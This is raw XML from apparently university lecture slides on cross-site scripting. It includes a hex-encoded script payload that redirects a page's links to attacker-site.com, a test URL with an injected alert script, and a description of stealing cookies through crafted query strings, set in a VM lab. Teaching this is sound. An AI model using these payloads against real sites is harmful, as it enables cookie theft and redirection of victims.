          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Normally an attacker tends not to craft </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>human </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>can directly read. So </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>will encode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ASCII </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>characters to hex as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>follows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>www.cis.udel.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cshen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>index.php?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=%48%65%6c%6c%57%6f%72%6c%64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>3e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Wingdings"/>
                <a:ea typeface="Wingdings"/>
                <a:cs typeface="Wingdings"/>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>attacker-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>site.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Now </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>may not know what it is, because directly he cannot understand that the URL is crafted and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>there </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>is a more chance that he can visit the URL.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3659276012"/>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534400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Stealing Cookies via XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Attack (1)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8534400" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client-side XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>takes the form of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>attacker gets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>an innocent victim to click on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>carefully crafted URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> to a web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Unknowingly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to the victim, this URL carries a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>query-string portion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>embedded JavaScript code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>that is designed to send the cookies stored in the client’s browser for web server’s domain to the attacker’s machine </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Convert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>WealthTracker.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>into a CGI script named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>WealthTracker.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>a Perl executable file that spits out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>that is sent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>browser requesting this page </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>WealthTracker.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-bin </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ip_of_VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>WealthTracker.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http://&lt;IP&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>WealthTracker.cgi?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=&lt;script&gt;alert(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Hello from a cookie stealer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>“);&lt;/script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215295586"/>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12193</TotalTime>
  <Words>2748</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>197</Paragraphs>
  <Slides>16</Slides>
  <Notes>0</Notes>
  <HiddenSlides>6</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Default Design</vt:lpstr>
      <vt:lpstr>Cross Site Scripting (XSS) Attack</vt:lpstr>
      <vt:lpstr>Managing Cookies with JavaScript </vt:lpstr>
      <vt:lpstr>How JavaScript Set/Change Cookies </vt:lpstr>
      <vt:lpstr>How JavaScript Set/Change Cookies </vt:lpstr>
      <vt:lpstr>How JavaScript Set/Change Cookies </vt:lpstr>
      <vt:lpstr>XSS Attack (1)</vt:lpstr>
      <vt:lpstr>XSS Attack (2)</vt:lpstr>
      <vt:lpstr>XSS Attack (3)</vt:lpstr>
      <vt:lpstr>Stealing Cookies via XSS Attack (1)</vt:lpstr>
      <vt:lpstr>Stealing Cookies via XSS Attack (2)</vt:lpstr>
      <vt:lpstr>Stealing Cookies via XSS Attack (3)</vt:lpstr>
      <vt:lpstr>Stealing Cookies via XSS Attack (4)</vt:lpstr>
      <vt:lpstr>CGI in Apache2 (1)</vt:lpstr>
      <vt:lpstr>CGI in Apache2 (2)</vt:lpstr>
      <vt:lpstr>Persistent XSS Attack (1)</vt:lpstr>
      <vt:lpstr>Persistent XSS Attack (2)</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>UD CIS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Unix System Overview</dc:title>
  <dc:creator>CHien-Chung Shen</dc:creator>
  <cp:lastModifiedBy>Chien-Chung Shen</cp:lastModifiedBy>
  <cp:revision>272</cp:revision>
  <cp:lastPrinted>2012-08-31T14:00:57Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-06-22T13:42:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-05-17T15:00:38Z</dcterms:modified>
</cp:coreProperties>
</file>